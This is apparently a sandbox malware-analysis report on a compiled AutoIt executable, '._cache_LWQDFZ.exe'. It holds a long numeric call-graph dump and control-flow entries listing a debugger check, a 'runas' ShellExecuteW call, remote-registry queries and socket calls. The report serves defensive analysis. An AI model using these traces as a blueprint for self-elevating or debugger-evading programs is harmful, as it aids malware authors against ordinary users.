__NMSG_WRITE 103832->103835 103956 3aa2fb 103833->103956 103836 3a7e7b 103835->103836 103837 3a7ec7 103835->103837 103952 3aa6f8 103836->103952 103955 3a7eda 48 API calls 103837->103955 103840 3a7e85 _memmove 103840->103730 103841->103734 103842->103739 103844 3aca9a 103843->103844 103845 3acad0 103843->103845 103850 3c010a 48 API calls 103844->103850 103846 3acad9 103845->103846 103847 3acae3 103845->103847 103848 3a7e53 48 API calls 103846->103848 103964 3ac4cd 103847->103964 103854 3acac6 103848->103854 103851 3acaad 103850->103851 103852 414f11 103851->103852 103853 3acab8 103851->103853 103852->103854 103855 3ad3d2 48 API calls 103852->103855 103853->103854 103856 3acaee 48 API calls 103853->103856 103854->103739 103855->103854 103856->103854 103860 3c0112 __calloc_impl 103857->103860 103859 3c012c 103859->103823 103860->103859 103861 3c012e std::exception::exception 103860->103861 103866 3c45ec 103860->103866 103880 3c7495 RaiseException 103861->103880 103863 3c0158 103881 3c73cb 47 API calls _free 103863->103881 103865 3c016a 103865->103823 103867 3c4667 __calloc_impl 103866->103867 103872 3c45f8 __calloc_impl 103866->103872 103887 3c889e 47 API calls __getptd_noexit 103867->103887 103870 3c462b RtlAllocateHeap 103870->103872 103879 3c465f 103870->103879 103872->103870 103873 3c4653 103872->103873 103876 3c4651 103872->103876 103877 3c4603 103872->103877 103885 3c889e 47 API calls __getptd_noexit 103873->103885 103886 3c889e 47 API calls __getptd_noexit 103876->103886 103877->103872 103882 3c8e52 47 API calls __NMSG_WRITE 103877->103882 103883 3c8eb2 47 API calls 6 library calls 103877->103883 103884 3c1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103877->103884 103879->103860 103880->103863 103881->103865 103882->103877 103883->103877 103885->103876 103886->103879 103887->103879 103890 3fc914 103888->103890 103891 3fc8f7 103888->103891 103946 3fc235 413 API calls Mailbox 103890->103946 103891->103890 103892 3fcc61 103891->103892 
103893 3fc934 103891->103893 103894 3fcc6e 103892->103894 103895 3fcca9 103892->103895 103893->103890 103924 3dabf3 103893->103924 103942 3bd6b4 48 API calls 103894->103942 103895->103890 103899 3fccb6 103895->103899 103897 3fc964 103897->103890 103900 3fc973 103897->103900 103944 3bd6b4 48 API calls 103899->103944 103910 3fc9a1 103900->103910 103928 3da8c8 103900->103928 103901 3fcc87 103943 3e97b6 89 API calls 103901->103943 103905 3fccd6 103945 3e503c 91 API calls Mailbox 103905->103945 103907 3fcadc VariantInit 103914 3fcb11 _memset 103907->103914 103911 3fca4a 103910->103911 103938 3da25b 106 API calls 103910->103938 103911->103907 103912 3fca86 VariantClear 103911->103912 103912->103911 103913 3fcaa5 SysAllocString 103912->103913 103913->103911 103915 3fcb8e 103914->103915 103916 3fcbb4 103914->103916 103921 3fcc52 103921->103828 103925 3dac04 __NMSG_WRITE 103924->103925 103927 3dac16 103924->103927 103925->103927 103947 3a3bcf 103925->103947 103927->103897 103930 3da8f2 103928->103930 103929 3da9ed SysFreeString 103933 3da9f9 103929->103933 103930->103929 103931 3da90a 103930->103931 103932 3daa7e 103930->103932 103930->103933 103931->103910 103932->103931 103932->103933 103935 3daad9 SysFreeString 103932->103935 103936 3daac9 lstrcmpiW 103932->103936 103933->103931 103951 3da78a RaiseException 103933->103951 103935->103932 103936->103935 103937 3daafa SysFreeString 103936->103937 103937->103933 103938->103910 103942->103901 103943->103921 103944->103905 103945->103921 103946->103921 103948 3a3bd9 __NMSG_WRITE 103947->103948 103949 3c010a 48 API calls 103948->103949 103950 3a3bee _wcscpy 103949->103950 103950->103927 103951->103933 103953 3c010a 48 API calls 103952->103953 103954 3aa702 103953->103954 103954->103840 103955->103840 103957 3aa321 _memmove 103956->103957 103958 3aa309 103956->103958 103957->103840 103958->103957 103960 3ab8a7 103958->103960 103961 3ab8ba 103960->103961 103963 3ab8b7 _memmove 103960->103963 103962 3c010a 48 API calls 
103961->103962 103962->103963 103963->103957 103965 3ac4e7 103964->103965 103967 3ac4da 103964->103967 103966 3c010a 48 API calls 103965->103966 103966->103967 103967->103854 103968->103756 103969->103750 103971 41787b 103970->103971 103974 3b406c 103970->103974 104150 3ed520 86 API calls 4 library calls 103971->104150 103973 41788c 104151 3ed520 86 API calls 4 library calls 103973->104151 103974->103973 103982 3b40a6 _memmove 103974->103982 103976 3b4175 103981 3b4185 103976->103981 104149 3fd21a 82 API calls Mailbox 103976->104149 103978 3c010a 48 API calls 103978->103982 103979 3b41f1 103979->103782 103980 3afa40 413 API calls 103980->103982 103981->103782 103982->103976 103982->103978 103982->103980 103982->103981 103983 4178d8 103982->103983 104152 3ed520 86 API calls 4 library calls 103983->104152 104153 3f22e5 103985->104153 103987 3f1090 103987->103779 103989 3a84a6 81 API calls 103988->103989 103990 3f6fd6 SetWindowTextW 103989->103990 103990->103779 104342 3acdb4 103991->104342 103993 3f9515 103994 3ebe47 50 API calls 103993->103994 103995 3f9522 103994->103995 103996 3f952f send 103995->103996 103997 3f9546 103996->103997 103998 3f9552 WSAGetLastError 103997->103998 103999 3f956a 103997->103999 103998->103999 103999->103779 104001 3a84a6 81 API calls 104000->104001 104002 3eeff2 104001->104002 104348 3e78ad GetFullPathNameW 104002->104348 104007 3ef04b CoInitialize CoCreateInstance 104009 3ef08e 104007->104009 104010 3ef070 104007->104010 104011 3a84a6 81 API calls 104009->104011 104012 3ef07a CoUninitialize 104010->104012 104013 3ef09d 104011->104013 104032 3ef23c Mailbox 104012->104032 104014 3ef0c1 104013->104014 104016 3a84a6 81 API calls 104013->104016 104016->104014 104032->103779 104035 3acdb4 48 API calls 104034->104035 104036 3f90e6 closesocket 104035->104036 104037 3f90f1 WSAGetLastError 104036->104037 104038 3f9106 104036->104038 104037->104038 104038->103779 104040 3acdb4 48 API calls 104039->104040 104041 3bf572 104040->104041 104042 4175d1 
Sleep 104041->104042 104043 3bf57a timeGetTime 104041->104043 104044 3acdb4 48 API calls 104043->104044 104045 3bf590 104044->104045 104368 3ae1f0 104045->104368 104049 3a84a6 81 API calls 104048->104049 104050 3edcfc 104049->104050 104633 3e6d6d 104050->104633 104052 3edd06 104052->103779 104054 3a50f6 104053->104054 104055 3a5105 104053->104055 104054->103779 104055->104054 104056 3a510a CloseHandle 104055->104056 104056->104054 104058 3ad3d2 48 API calls 104057->104058 104059 40354a 104058->104059 104060 3ad3d2 48 API calls 104059->104060 104061 403553 104060->104061 104062 3ad3d2 48 API calls 104061->104062 104063 40355c 104062->104063 104064 3a84a6 81 API calls 104063->104064 104072 4035e9 Mailbox 104063->104072 104065 403580 104064->104065 104645 403d7b 104065->104645 104072->103779 104146 3f95e0 104145->104146 104146->103779 104147->103780 104148->103779 104149->103979 104150->103973 104151->103981 104152->103981 104154 3f2306 104153->104154 104155 3f230a 104154->104155 104156 3f2365 104154->104156 104157 3c010a 48 API calls 104155->104157 104222 3bf0f3 48 API calls 104156->104222 104159 3f2311 104157->104159 104160 3f231f 104159->104160 104209 3a5080 49 API calls 104159->104209 104162 3a84a6 81 API calls 104160->104162 104164 3f2331 104162->104164 104163 3f2379 104165 3f234d 104163->104165 104167 3f243f 104163->104167 104169 3f23bb 104163->104169 104210 3a4bf9 104164->104210 104165->103987 104225 3ebe47 104167->104225 104173 3a84a6 81 API calls 104169->104173 104171 3f2446 104229 3e689f SetFilePointerEx SetFilePointerEx WriteFile 104171->104229 104172 3f2341 104172->104165 104221 3a4592 CloseHandle 104172->104221 104180 3f23c2 104173->104180 104175 3f23f6 104191 3e67dc 104175->104191 104178 3f2400 104223 3a7b6e 48 API calls 104178->104223 104180->104175 104180->104178 104181 3f2410 104182 3ac935 48 API calls 104181->104182 104183 3f241a 104182->104183 104224 3a39e8 48 API calls 2 library calls 104183->104224 104185 3f23fe Mailbox 104185->104165 104187 
3a50ec CloseHandle 104185->104187 104186 3f2428 104188 3e67dc 55 API calls 104186->104188 104189 3f2490 104187->104189 104188->104185 104230 3a4592 CloseHandle 104189->104230 104192 3e67ec 104191->104192 104193 3e67f6 104191->104193 104247 3e6917 SetFilePointerEx SetFilePointerEx WriteFile 104192->104247 104195 3e67fc 104193->104195 104196 3e6808 104193->104196 104248 3e68b9 51 API calls 104195->104248 104199 3e6824 104196->104199 104200 3e6811 104196->104200 104197 3e67f4 Mailbox 104197->104185 104231 3aa6d4 104199->104231 104201 3aa6d4 48 API calls 104200->104201 104203 3e6816 104201->104203 104249 3e66f8 50 API calls 104203->104249 104209->104160 104211 3a50ec CloseHandle 104210->104211 104212 3a4c04 104211->104212 104287 3a4b88 104212->104287 104214 3a4c44 104214->104163 104214->104172 104221->104165 104222->104163 104223->104181 104224->104186 104226 3ebe55 104225->104226 104227 3ebe50 104225->104227 104226->104171 104341 3eae06 50 API calls 2 library calls 104227->104341 104229->104185 104230->104165 104232 3c010a 48 API calls 104231->104232 104233 3aa6e7 104232->104233 104234 3aa6f8 48 API calls 104233->104234 104247->104197 104248->104197 104288 414957 104287->104288 104289 3a4ba1 CreateFileW 104287->104289 104290 41495d CreateFileW 104288->104290 104292 3a4bc3 104288->104292 104289->104292 104291 414983 104290->104291 104290->104292 104316 3a4ee9 104291->104316 104292->104214 104294 3a4df0 104292->104294 104296 3a4e10 104294->104296 104295 3a4e69 104296->104295 104297 3a4ee9 2 API calls 104296->104297 104306 3a4ebd 104296->104306 104341->104226 104343 3acdc5 104342->104343 104344 3acdca 104342->104344 104343->104344 104347 3c2241 48 API calls 104343->104347 104344->103993 104346 3ace07 104346->103993 104347->104346 104349 3a7e53 48 API calls 104348->104349 104350 3e78df 104349->104350 104362 3be617 104350->104362 104353 3f267a 104354 3f26a4 __NMSG_WRITE 104353->104354 104355 3ef039 104354->104355 104356 3f26d8 104354->104356 104359 3f2763 104354->104359 
104355->104007 104360 3a39e8 48 API calls 2 library calls 104355->104360 104356->104355 104366 3bdfd2 60 API calls 104356->104366 104359->104355 104367 3bdfd2 60 API calls 104359->104367 104360->104007 104363 3be625 104362->104363 104364 3aa2fb 48 API calls 104363->104364 104365 3be635 104364->104365 104365->104353 104366->104356 104367->104359 104369 3ae216 104368->104369 104429 3ae226 Mailbox 104368->104429 104370 3ae670 104369->104370 104369->104429 104498 3becee 413 API calls 104370->104498 104372 3ae4fd 104372->103779 104374 3ae681 104374->104372 104376 3ae68e 104374->104376 104375 3ae26c PeekMessageW 104375->104429 104500 3bec33 413 API calls Mailbox 104376->104500 104378 415b13 Sleep 104378->104429 104379 3ae695 LockWindowUpdate DestroyWindow GetMessageW 104379->104372 104382 3ae6c7 104379->104382 104380 3ae4e7 104380->104372 104499 3a322e 16 API calls 104380->104499 104384 4162a7 TranslateMessage DispatchMessageW GetMessageW 104382->104384 104384->104384 104385 4162d7 104384->104385 104385->104372 104386 3ae657 PeekMessageW 104386->104429 104387 3c010a 48 API calls 104387->104429 104388 3ae517 timeGetTime 104388->104429 104390 3ac935 48 API calls 104390->104429 104391 3ae641 TranslateMessage DispatchMessageW 104391->104386 104392 415dfc WaitForSingleObject 104396 415e19 GetExitCodeProcess CloseHandle 104392->104396 104392->104429 104393 3ad3d2 48 API calls 104424 415cce Mailbox 104393->104424 104394 3a1000 389 API calls 104394->104429 104395 416147 Sleep 104395->104424 104396->104429 104397 3ae6cc timeGetTime 104501 3bcf79 49 API calls 104397->104501 104400 415feb Sleep 104400->104429 104404 4161de GetExitCodeProcess 104407 4161f4 WaitForSingleObject 104404->104407 104408 41620a CloseHandle 104404->104408 104406 415cea Sleep 104406->104429 104407->104408 104407->104429 104408->104424 104409 415cd7 Sleep 104409->104406 104410 408a48 108 API calls 104410->104424 104411 3a1dce 107 API calls 104411->104429 104413 416266 Sleep 104413->104429 104414 3bcf79 49 API 
calls 104414->104429 104417 3acaee 48 API calls 104417->104424 104419 3afa40 389 API calls 104419->104429 104422 3b44e0 389 API calls 104422->104429 104423 3b3680 389 API calls 104423->104429 104424->104393 104424->104404 104424->104406 104424->104409 104424->104410 104424->104413 104424->104417 104424->104429 104503 3e56dc 49 API calls Mailbox 104424->104503 104504 3bcf79 49 API calls 104424->104504 104505 3ad380 104424->104505 104509 3a1000 413 API calls 104424->104509 104511 3fd12a 50 API calls 104424->104511 104512 3e8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104424->104512 104513 3be3a5 timeGetTime 104424->104513 104514 3e6f5b CreateToolhelp32Snapshot Process32FirstW 104424->104514 104426 3ed520 86 API calls 104426->104429 104427 3acaee 48 API calls 104427->104429 104428 3ad380 55 API calls 104428->104429 104429->104375 104429->104378 104429->104380 104429->104386 104429->104387 104429->104388 104429->104390 104429->104391 104429->104392 104429->104394 104429->104395 104429->104397 104429->104400 104429->104406 104429->104411 104429->104414 104429->104419 104429->104422 104429->104423 104429->104424 104429->104426 104429->104427 104429->104428 104430 3ae7e0 104429->104430 104437 3aea00 104429->104437 104487 3bf381 104429->104487 104492 3bed1a 104429->104492 104497 3ae7b0 413 API calls Mailbox 104429->104497 104502 408b20 48 API calls 104429->104502 104510 3be3a5 timeGetTime 104429->104510 104431 3ae7fd 104430->104431 104433 3ae80f 104430->104433 104521 3adcd0 104431->104521 104552 3ed520 86 API calls 4 library calls 104433->104552 104435 3ae806 104435->104429 104436 4198e8 104436->104436 104438 3aea20 104437->104438 104439 3afa40 413 API calls 104438->104439 104443 3aea89 104438->104443 104441 419919 104439->104441 104440 4199bc 104567 3ed520 86 API calls 4 library calls 104440->104567 104441->104443 104564 3ed520 86 API calls 4 library calls 104441->104564 104446 3ad3d2 48 API calls 104443->104446 104468 3aeb18 
104443->104468 104470 3aecd7 Mailbox 104443->104470 104444 3ad3d2 48 API calls 104447 419997 104444->104447 104448 419963 104446->104448 104566 3c1b2a 52 API calls __cinit 104447->104566 104565 3c1b2a 52 API calls __cinit 104448->104565 104449 3ed520 86 API calls 104449->104470 104452 3ad380 55 API calls 104452->104470 104454 419d70 104576 3fe2fb 413 API calls Mailbox 104454->104576 104455 3a342c 48 API calls 104455->104470 104456 419e49 104581 3ed520 86 API calls 4 library calls 104456->104581 104457 419dc2 104578 3ed520 86 API calls 4 library calls 104457->104578 104458 419ddf 104579 3fc235 413 API calls Mailbox 104458->104579 104460 3afa40 413 API calls 104460->104470 104466 419df7 104486 3aef0c Mailbox 104466->104486 104580 3ed520 86 API calls 4 library calls 104466->104580 104467 3b14a0 48 API calls 104467->104470 104468->104444 104468->104470 104470->104440 104470->104449 104470->104452 104470->104454 104470->104455 104470->104456 104470->104457 104470->104458 104470->104460 104470->104467 104471 3af56f 104470->104471 104474 419a3c 104470->104474 104470->104486 104560 3ad805 104470->104560 104568 3ea3ee 48 API calls 104470->104568 104569 3fede9 413 API calls 104470->104569 104574 3da599 InterlockedDecrement 104470->104574 104575 3ff4df 413 API calls 104470->104575 104471->104486 104577 3ed520 86 API calls 4 library calls 104471->104577 104570 3fd154 48 API calls 104474->104570 104476 419a48 104478 419a56 104476->104478 104479 419a9b 104476->104479 104571 3ea485 48 API calls 104478->104571 104482 419a91 Mailbox 104479->104482 104572 3eafce 48 API calls 104479->104572 104480 3afa40 413 API calls 104480->104486 104482->104480 104486->104429 104488 41ee11 104487->104488 104489 3bf390 104487->104489 104490 41ee46 104488->104490 104491 41ee28 TranslateAcceleratorW 104488->104491 104489->104429 104491->104489 104493 3bed2c 104492->104493 104494 3bed34 104492->104494 104493->104429 104494->104493 104495 3bed5e IsDialogMessageW 104494->104495 104496 41ebec 
GetClassLongW 104494->104496 104495->104493 104495->104494 104496->104494 104496->104495 104497->104429 104498->104380 104499->104374 104500->104379 104501->104429 104502->104429 104503->104424 104504->104424 104506 3ad38b 104505->104506 104507 3ad3b4 104506->104507 104582 3ad772 55 API calls 104506->104582 104507->104424 104509->104424 104510->104429 104511->104424 104512->104424 104513->104424 104583 3e79c2 104514->104583 104516 3e6fa4 Process32NextW 104517 3e7021 CloseHandle 104516->104517 104518 3e6fa0 _wcscat 104516->104518 104517->104424 104518->104516 104518->104517 104589 3c297d 104518->104589 104592 3c1bc7 104518->104592 104522 3afa40 413 API calls 104521->104522 104535 3add0f _memmove 104522->104535 104523 418dbe 104559 3ed520 86 API calls 4 library calls 104523->104559 104525 418ddc 104525->104525 104526 3add70 104526->104435 104527 3ae12b Mailbox 104529 3c010a 48 API calls 104527->104529 104528 3ae051 104531 3ae066 104528->104531 104532 418daf 104528->104532 104543 3adecb _memmove 104529->104543 104530 3c010a 48 API calls 104530->104535 104533 3c010a 48 API calls 104531->104533 104558 3fd1da 50 API calls 104532->104558 104542 3adf64 104533->104542 104535->104523 104535->104526 104535->104527 104535->104530 104537 3adeb7 104535->104537 104547 3adf29 104535->104547 104536 3adef6 104536->104547 104553 3b4320 413 API calls 104536->104553 104537->104527 104539 3adec4 104537->104539 104538 3c010a 48 API calls 104538->104536 104541 3c010a 48 API calls 104539->104541 104540 418d9e 104557 3ed520 86 API calls 4 library calls 104540->104557 104541->104543 104542->104435 104543->104536 104543->104538 104543->104547 104547->104528 104547->104540 104547->104542 104548 418d76 104547->104548 104550 418d51 104547->104550 104554 3a5322 413 API calls 104547->104554 104556 3ed520 86 API calls 4 library calls 104548->104556 104555 3ed520 86 API calls 4 library calls 104550->104555 104552->104436 104553->104547 104554->104547 104555->104542 104556->104542 104557->104542 
104558->104523 104559->104525 104561 3ad828 _memmove 104560->104561 104562 3ad815 104560->104562 104561->104470 104562->104561 104563 3c010a 48 API calls 104562->104563 104563->104561 104564->104443 104565->104468 104566->104470 104567->104486 104568->104470 104569->104470 104570->104476 104571->104482 104574->104470 104575->104470 104576->104471 104577->104486 104578->104486 104579->104466 104580->104486 104581->104486 104582->104507 104584 3e79e9 104583->104584 104588 3e79d0 104583->104588 104603 3c224a 58 API calls __wcstoi64 104584->104603 104587 3e79ef 104587->104518 104588->104584 104588->104587 104602 3c22df GetStringTypeW __towlower_l 104588->104602 104604 3c29c7 104589->104604 104593 3c1c48 104592->104593 104594 3c1bd3 104592->104594 104632 3c1c5a 59 API calls 3 library calls 104593->104632 104601 3c1bf8 104594->104601 104630 3c889e 47 API calls __getptd_noexit 104594->104630 104598 3c1bdf 104601->104518 104602->104588 104603->104587 104605 3c29e2 104604->104605 104609 3c29d6 104604->104609 104628 3c889e 47 API calls __getptd_noexit 104605->104628 104609->104605 104614 3c2a55 104609->104614 104623 3ca9fb 47 API calls __woutput_l 104609->104623 104614->104605 104623->104614 104630->104598 104635 3e6d8a __NMSG_WRITE 104633->104635 104634 3e6db3 GetFileAttributesW 104636 3e6dc5 GetLastError 104634->104636 104643 3e6de3 104634->104643 104635->104634 104637 3e6de7 104636->104637 104638 3e6dd0 CreateDirectoryW 104636->104638 104639 3a3bcf 48 API calls 104637->104639 104637->104643 104638->104637 104638->104643 104640 3e6df7 _wcsrchr 104639->104640 104641 3e6d6d 48 API calls 104640->104641 104640->104643 104642 3e6e1b 104641->104642 104642->104643 104644 3e6e28 CreateDirectoryW 104642->104644 104643->104052 104644->104643 104646 3ac4cd 48 API calls 104645->104646 104647 403d89 104646->104647 104648 3ac4cd 48 API calls 104647->104648 104649 403d91 104648->104649 104650 3ac4cd 48 API calls 104649->104650 104651 403d99 104650->104651 104652 403e01 104651->104652 
104692 3aa4f6 104651->104692 104654 3ac4cd 48 API calls 104652->104654 104693 3ab8a7 48 API calls 104692->104693 104702->103810 104703->103810 104704->103311 104705->103311 104706->103311 104707->103311 104708->103311 104709->103306 104710->103303 104711->103286 104712->103280 104713->103288 104714->103296 104716 3e7700 104715->104716 104727 3e76f9 _wcsncpy 104715->104727 104717 3c010a 48 API calls 104716->104717 104718 3e7706 GetFileVersionInfoW 104717->104718 104719 3e7722 __NMSG_WRITE 104718->104719 104720 3c010a 48 API calls 104719->104720 104722 3e7739 _wcscat _wcscmp _wcscpy _wcsstr 104720->104722 104721 3c1bc7 _W_store_winword 59 API calls 104723 3e77f7 104721->104723 104725 3e7779 75381560 104722->104725 104729 3e7793 _wcscat 104722->104729 104724 3e7827 75381560 104723->104724 104723->104727 104726 3e783d _wcscmp 104724->104726 104724->104727 104725->104729 104726->104727 104730 3c234b 80 API calls 2 library calls 104726->104730 104727->103336 104729->104721 104730->104727 104732 3bf069 104731->104732 104733 3bf057 104731->104733 104736 3ac4cd 48 API calls 104732->104736 104734 3bf05d 104733->104734 104735 3bf063 104733->104735 104738 3aa6d4 48 API calls 104734->104738 104737 3aa6d4 48 API calls 104735->104737 104746 3e64f5 104736->104746 104739 3e668b 104737->104739 104741 3bf081 104738->104741 104742 3a4c4f 50 API calls 104739->104742 104740 3e6524 104740->103376 104766 3a4c4f 104741->104766 104745 3e6699 104742->104745 104753 3e66a9 Mailbox 104745->104753 104793 3e6765 50 API calls 104745->104793 104746->104740 104791 3e649b ReadFile SetFilePointerEx 104746->104791 104792 3abd2f 48 API calls _memmove 104746->104792 104748 4149b2 104752 3bf0a3 Mailbox 104752->103376 104753->103376 104755 3a7c3a 104754->104755 104756 3a7bfb 104754->104756 104757 3ac935 48 API calls 104755->104757 104759 3c010a 48 API calls 104756->104759 104758 3a7c0e 104757->104758 104758->103380 104759->104758 104760->103353 104761->103381 104762->103350 104763->103356 104764->103372 
104765->103379 104767 3bf324 48 API calls 104766->104767 104770 3a4c60 104767->104770 104768 3a4ca0 2 API calls 104768->104770 104769 3a4c95 104769->104748 104772 3ac610 MultiByteToWideChar 104769->104772 104770->104768 104770->104769 104794 3a4d29 104770->104794 104773 3ac638 104772->104773 104774 4124df 104772->104774 104775 3c010a 48 API calls 104773->104775 104776 3ac4cd 48 API calls 104774->104776 104777 3ac64f MultiByteToWideChar 104775->104777 104778 4124e7 104776->104778 104779 3ac66c 104777->104779 104780 3ac6b7 104777->104780 104783 3aa6f8 48 API calls 104778->104783 104779->104780 104784 3ac675 104779->104784 104781 3aa2fb 48 API calls 104780->104781 104782 3ac6c3 104781->104782 104782->104752 104785 4124f6 104783->104785 104784->104778 104787 3ac686 104784->104787 104786 3c010a 48 API calls 104785->104786 104788 412518 104786->104788 104789 3ac68e _memmove 104787->104789 104790 3c010a 48 API calls 104787->104790 104789->104752 104790->104789 104791->104746 104792->104746 104793->104753 104795 3a4d3d 104794->104795 104796 4145cf 104794->104796 104803 3a4d67 104795->104803 104798 3aa6f8 48 API calls 104796->104798 104800 4145da 104798->104800 104799 3a4d49 104799->104770 104801 3c010a 48 API calls 104800->104801 104802 4145ef _memmove 104801->104802 104804 3a4d7d 104803->104804 104807 3a4d78 _memmove 104803->104807 104805 3c010a 48 API calls 104804->104805 104806 414703 104804->104806 104805->104807 104807->104799 104809 3ad89e 50 API calls 104808->104809 104810 3a1a08 104809->104810 104811 3a1a12 104810->104811 104812 41db7d 104810->104812 104814 3a84a6 81 API calls 104811->104814 104813 3a7e53 48 API calls 104812->104813 104815 41db8d 104813->104815 104816 3a1a1f 104814->104816 104815->104815 104817 3ac935 48 API calls 104816->104817 104818 3a1a2d 104817->104818 104819 3a1dce 104818->104819 104820 3a1de4 Mailbox 104819->104820 104821 41db26 104820->104821 104822 3a1dfd 104820->104822 104823 41db2b IsWindow 104821->104823 104824 3a1e46 104822->104824 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 003A376D
  • Part of subcall function 003A4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00000000,00000001,00000000), ref: 003A428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 003A377F
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00461120,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00461124,?,?), ref: 003A37EE
  • Part of subcall function 003A34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003A352A
• SetCurrentDirectoryW.KERNEL32(?), ref: 003A3860
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00452934,00000010), ref: 004121C5
• SetCurrentDirectoryW.KERNEL32(?,?), ref: 004121FD
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00412232
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0043DAA4), ref: 00412290
• ShellExecuteW.SHELL32(00000000), ref: 00412297
  • Part of subcall function 003A30A5: GetSysColorBrush.USER32(0000000F), ref: 003A30B0
  • Part of subcall function 003A30A5: LoadCursorW.USER32(00000000,00007F00), ref: 003A30BF
  • Part of subcall function 003A30A5: LoadIconW.USER32(00000063), ref: 003A30D5
  • Part of subcall function 003A30A5: LoadIconW.USER32(000000A4), ref: 003A30E7
                                                                                                                        • Part of subcall function 003A30A5: LoadIconW.USER32(000000A2), ref: 003A30F9
                                                                                                                        • Part of subcall function 003A30A5: RegisterClassExW.USER32(?), ref: 003A3167
                                                                                                                        • Part of subcall function 003A2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003A2ECB
                                                                                                                        • Part of subcall function 003A2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003A2EEC
                                                                                                                        • Part of subcall function 003A2E9D: ShowWindow.USER32(00000000), ref: 003A2F00
                                                                                                                        • Part of subcall function 003A2E9D: ShowWindow.USER32(00000000), ref: 003A2F09
                                                                                                                        • Part of subcall function 003A3598: _memset.LIBCMT ref: 003A35BE
                                                                                                                        • Part of subcall function 003A3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003A3667
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                      • String ID: C:\Users\user\Desktop\._cache_LWQDFZ.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"F
                                                                                                                      • API String ID: 4253510256-3087517855
                                                                                                                      • Opcode ID: fc75448a53ff3ab068836f0e790ade57028805e9d770f55eb5479f401b23242f
                                                                                                                      • Instruction ID: 9c7bd7b4e1f5f0065728c2f727e76998408cdd3f8afaa572bbbad7cce7a1931b
                                                                                                                      • Opcode Fuzzy Hash: fc75448a53ff3ab068836f0e790ade57028805e9d770f55eb5479f401b23242f
                                                                                                                      • Instruction Fuzzy Hash: D051DB71A44244BBCB12E7A0DC46FEE7778DB1B710F140067F641961A1E7F88A89CB6B

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040317F
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0040321E
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004032B6
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004034F5
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00403502
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: 3fdeba90fc071f7d9bddcbb9f919d8714024f13dacd011b4d56e70aef24ae10b
